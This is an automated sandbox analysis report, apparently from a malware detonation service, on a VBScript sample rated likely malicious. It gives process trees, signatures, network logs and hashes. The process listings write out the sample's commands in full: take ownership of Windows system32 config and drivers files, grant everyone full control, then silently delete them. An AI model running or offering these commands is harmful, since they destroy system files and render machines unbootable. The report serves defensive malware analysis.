Malware Analysis Report

2024-11-16 12:53

Sample ID 240815-1chybazemk
Target script.vbs
SHA256 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a

Threat Level: Likely malicious

The file script.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:30

Reported

2024-08-15 21:33

Platform

win7-20240708-en

Max time kernel

119s

Max time network

126s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2372 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2372 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 320 wrote to memory of 2824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2808 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2808 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 320 wrote to memory of 2808 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2824 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2824 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2824 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2808 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2824 wrote to memory of 2316 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2824 wrote to memory of 2316 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2824 wrote to memory of 2316 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 cef6ac1c7b72212cb9b26421ba748362
SHA1 05858a591fc90a1af835454aee11b7d893649517
SHA256 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
SHA512 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c

C:\Users\Admin\Desktop\DebugPublish.vbs

MD5 4b91264568ac2162700be36338c095e8
SHA1 c95726edf8303e6adabcb12ffdca90b51349990a
SHA256 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512 e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:30

Reported

2024-08-15 21:33

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

157s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 cef6ac1c7b72212cb9b26421ba748362
SHA1 05858a591fc90a1af835454aee11b7d893649517
SHA256 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
SHA512 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c